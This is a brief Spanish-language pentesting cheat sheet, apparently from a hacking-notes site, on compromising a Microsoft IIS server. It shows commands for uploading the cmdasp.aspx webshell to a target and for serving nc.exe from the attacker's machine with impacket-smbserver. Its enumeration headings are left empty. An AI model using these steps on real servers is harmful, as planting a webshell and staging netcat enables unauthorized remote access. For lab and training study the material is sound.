🌐Microsoft IIS - Webshell - windows
🏴☠️ ¿Obtener acceso remoto?
put cmdasp.aspx # Subir el archivo que nos habiamos copiado a nuestro directorio.<host_objetivo>/cmdasp.aspx # Apuntar al host objetivo.🔓 ¿Cómo consigo intrusión a nuestra máquina víctima?
find / -name nc.exe 2>/dev/null # Buscamos este archivo en nuestra máquina atacante y lo copiamos a nuestro directorio de trabajo actual. impacket-smbserver <nombre_recurso> $(pwd) -smb2support # Con $(pwd) le indicamos que levante el servidor en el directório actual.📝 Comandos de interés
🔍 Enumeración del Sistema
🔍Información de Usuario y Privilegios
🔍Enumeración de Red
🔍 Búsqueda de Archivos Sensibles
Last updated